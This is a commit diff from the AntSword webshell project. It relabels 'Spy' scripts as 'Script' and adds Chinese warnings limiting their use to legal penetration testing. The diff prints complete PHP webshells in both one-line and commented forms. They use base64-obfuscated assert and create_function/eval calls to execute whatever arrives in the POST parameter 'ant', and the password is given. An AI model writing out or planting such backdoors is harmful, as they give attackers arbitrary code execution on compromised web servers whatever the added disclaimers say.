Commit c03f6d26 authored by Medicean's avatar Medicean

Stat(Scripts): Update statement for all scripts

更新声明
parent d5c47b10
## Shell-Scripts ## Shell-Scripts
> 此目录用于存放一些示例的服务端脚本文件,仅供参考。 > 此目录用于存放一些示例的服务端脚本文件,仅供合法的渗透测试以及爱好者参考学习,请勿用于非法用途,否则将追究其相关责任!
### PHP ### PHP
1. [PHP Custom Spy for Mysql](./php_custom_spy_for_mysql.php) 1. [PHP Custom Script for Mysql](./php_custom_script_for_mysql.php)
2. [PHP Create_Function](./php_create_function.php) 2. [PHP Create_Function Script](./php_create_function_script.php)
3. [PHP Assert](./php_assert.php) 3. [PHP Assert Script](./php_assert_script.php)
### JSP ### JSP
1. [JSP Custom Spy for Mysql](./jsp_custom_spy_for_mysql.jsp) 1. [JSP Custom Script for Mysql](./jsp_custom_script_for_mysql.jsp)
...@@ -5,8 +5,10 @@ ...@@ -5,8 +5,10 @@
| (_| | | | | |_ ___) \ V V / (_) | | | (_| | | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_| \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
——————————————————————————————————————————————— ———————————————————————————————————————————————
AntSword JSP Custom Spy for Mysql AntSword JSP Custom Script for Mysql
Author:Medici.Yan 警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
——————————————————————————————————————————————— ———————————————————————————————————————————————
说明: 说明:
......
<?php $ant=base64_decode("YXNzZXJ0");$ant($_POST['ant']);?>
\ No newline at end of file
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP assert Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd=ant
*/
$ant=base64_decode("YXNzZXJ0");
$ant($_POST['ant']);
?>
\ No newline at end of file
<?php $ant=create_function("", base64_decode('QGV2YWwoJF9QT1NUWyJhbnQiXSk7'));$ant();?>
\ No newline at end of file
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP Create_Function Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd = ant
*/
$ant=create_function("", base64_decode('QGV2YWwoJF9QT1NUWyJhbnQiXSk7'));
$ant();
?>
\ No newline at end of file
...@@ -6,8 +6,11 @@ ...@@ -6,8 +6,11 @@
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| | * | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_| * \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ——————————————————————————————————————————————— * ———————————————————————————————————————————————
* AntSword PHP Custom Spy for Mysql * AntSword PHP Custom Script for Mysql
* Author:Medici.Yan *
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ——————————————————————————————————————————————— * ———————————————————————————————————————————————
* *
* 使用说明: * 使用说明:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment